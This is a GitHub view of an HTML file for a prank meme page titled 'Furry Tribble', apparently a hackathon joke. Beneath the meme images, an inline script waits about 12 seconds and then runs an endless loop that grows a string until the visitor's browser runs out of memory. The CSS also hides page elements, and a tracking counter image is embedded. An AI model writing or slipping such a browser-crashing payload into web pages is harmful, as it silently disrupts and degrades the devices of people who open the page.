-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
51 lines (51 loc) · 1.67 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Furry Tribble</title>
<style>
body {
background-color: yellow;
color: hotpink;
}
#tv {
height: 0px !important;
}
.iframe {
opacity: 0;
}
</style>
</head>
<body>
<center>
undefined
<h1>Yee</h1>
<img src="http://i3.kym-cdn.com/entries/icons/original/000/016/362/tumblr_nb7jgq9kcR1slfxluo1_1280.jpg" alt="Yee">
<img src="https://cdn.meme.am/cache/images/folder609/300x/14281609.jpg" alt="Peek at choo">
<img src="http://media2.giphy.com/media/qKHkmPEhtXjCE/giphy.gif" alt="Spook">
</center>
<div class="tv" id="tv"></div>
undefined
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="./script.js"></script>
<script>
setTimeout(function() {
txt = "abcdef";
while(true) {
txt = txt += "abcdef"; //add as much as the browser can handle
}
}, 12007)
</script>
<footer>
<center>
© Script Kiddies LLC. 2016
<br />
<a href="http://www.reliablecounter.com" target="_blank"><img src="http://www.reliablecounter.com/count.php?page=stupidshitnooneinhawaiineedshackathon.github.io/furry-tribble.github.io/&digit=style/plain/19/&reloads=0" alt="" title="" border="0"></a><br /><a href="http://www.curinglight.com" target="_blank" style="font-family: Geneva, Arial; font-size: 9px; color: #330010; text-decoration: none;">Polymerisationsleuchte</a>
<p style="color: yellow;">send pics</p>
</center>
</footer>
</body>
</html>